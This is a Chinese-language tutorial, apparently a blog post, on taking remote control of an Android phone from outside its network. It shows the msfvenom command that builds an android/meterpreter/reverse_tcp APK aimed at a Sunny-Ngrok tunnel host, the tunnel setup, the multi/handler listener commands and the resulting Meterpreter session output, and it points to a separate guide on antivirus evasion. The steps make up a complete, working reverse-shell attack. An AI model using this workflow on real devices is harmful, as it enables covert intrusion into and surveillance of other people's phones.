一。测试环境:
实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX):
安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX):
思路:制作payload,攻击,映射端口
二、准备:一个ngrok帐号。
2.1没有可以去注册:https://www.ngrok.cc/login/register,选择免费的隧道,协议选择TCP ,如下图结果:
2.2注册好帐号,在下载对应的客户端,我选择的是64位的系统,下载运行。
cd /root/下载/linux_amd64/
./sunny clientid 0159XX8b07aXXXXX //隧道id
运行NGROK后提示下列信息:
Sunny-Ngrok 官 网 www.ngrok.cc+C 退 出 )
Tunnel Status online
免费的要多连几次,也可以购买1个月的玩一下,才10大洋!
三、生成payload
运行
msfvenom -p android/meterpreter/reverse_tcp lhost=free.XXXXX.com lport=11009 R > /home/fandan.apk
红色部分换成你申请的服务器地址和服务器对应的端口,一定要记得!
结果显示如下:
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10191 bytes
要是 免杀可以参考上一篇文章:https://blog.csdn.net/wjwqp/article/details/105420153
生成不了要确认服务端口和隧道ID是否正确
四、启动msfconsole,运行:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.XX
exploit
五、把fandan.apk上传到安卓Oppo手机。
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.XX:11009
[*] Sending stage (73548 bytes) to 192.168.0.XX
[*] Meterpreter session 2 opened (192.168.0.XX:11009 -> 192.168.0.XX:41230) at 2020-04-11 20:39:23 +0800
meterpreter > sysinfo
Computer : localhost
OS : Android 9 - Linux 4.9.112-perf+ (aarch64)
Meterpreter : dalvik/android
meterpreter >ipconfig // 查看oppo的ip地址
好了,现在可以在msf下对appo手机进行访问了。
本实验到此结算